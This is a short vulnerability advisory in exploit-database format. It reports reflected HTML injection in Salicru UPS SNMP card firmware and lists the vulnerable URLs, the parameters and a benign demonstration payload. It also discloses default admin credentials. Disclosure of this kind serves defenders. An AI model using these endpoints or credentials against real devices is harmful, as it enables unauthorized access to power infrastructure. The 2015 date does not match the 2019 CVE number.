33 lines
No EOL
766 B
Text
33 lines
No EOL
766 B
Text
# Exploit Title: Reflected HTML Injection
|
|
# Google Dork: None
|
|
# Date: 16/12/2015
|
|
# Exploit Author: Ramikan
|
|
# Vendor Homepage:https://www.salicru.com/en/
|
|
# Software Link: N/A
|
|
# Version: Tested on SaLICru -SLC-20-cube3(5).
|
|
# Firmware: cs121-SNMP v4.54.82.130611
|
|
# CVE : CVE-2019-10887
|
|
# Category:Web Apps
|
|
|
|
|
|
Vulnerability: Reflected HTML Injection
|
|
Vendor Web site:
|
|
Version tested:cs121-SNMP v4.54.82.130611
|
|
Solution: N/A
|
|
Note:Default credential:admin/admin or admin/cs121-snmp
|
|
Victim need to be authenticated in order to get affected by this.
|
|
|
|
|
|
Vulnerability 1:Refelected HTML Injection
|
|
|
|
Affected URL:
|
|
|
|
/DataLog.csv?log=
|
|
/AlarmLog.csv?log=
|
|
/waitlog.cgi?name=
|
|
/chart.shtml?data=
|
|
/createlog.cgi?name=
|
|
|
|
Affected Parameter: log, name, data
|
|
|
|
Payload: <h1>HTML Injection</h1> |